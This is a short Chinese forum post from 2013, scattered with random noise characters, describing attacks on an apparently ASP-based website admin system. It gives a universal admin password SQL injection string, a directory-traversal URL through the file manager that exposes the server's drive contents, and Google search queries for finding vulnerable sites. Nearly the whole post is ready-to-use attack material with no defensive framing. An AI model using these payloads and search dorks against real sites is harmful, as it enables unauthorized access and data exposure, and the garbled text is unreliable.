后台万能密码 'or'='or'
, o% f _8 P* F3 P
/ V' }3 t Z2 {1 Y3 I后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
2 H2 O0 `2 x4 P4 g% Radmin/uploadfile.asp?currentFolder=/upfiles/../$ a& [. I+ R+ A8 S* [
4 u2 g: E- D4 y( N$ g2 l K# K
漏洞证明:3 M$ T- D, a8 u$ s8 c# [! H# g2 L
! D. T; c& J# C谷歌:inurl:type.asp?id=1 新闻中心2 f0 V- K+ v+ b8 B/ n+ u6 s
或者 :inurl:download_ok.asp?
+ E! C; e8 I% p& Q, H3 k8 T" o1 d/ Q. Q/ b. O& n
|
发表于 2013-3-14 20:17:32
收藏
支持
反对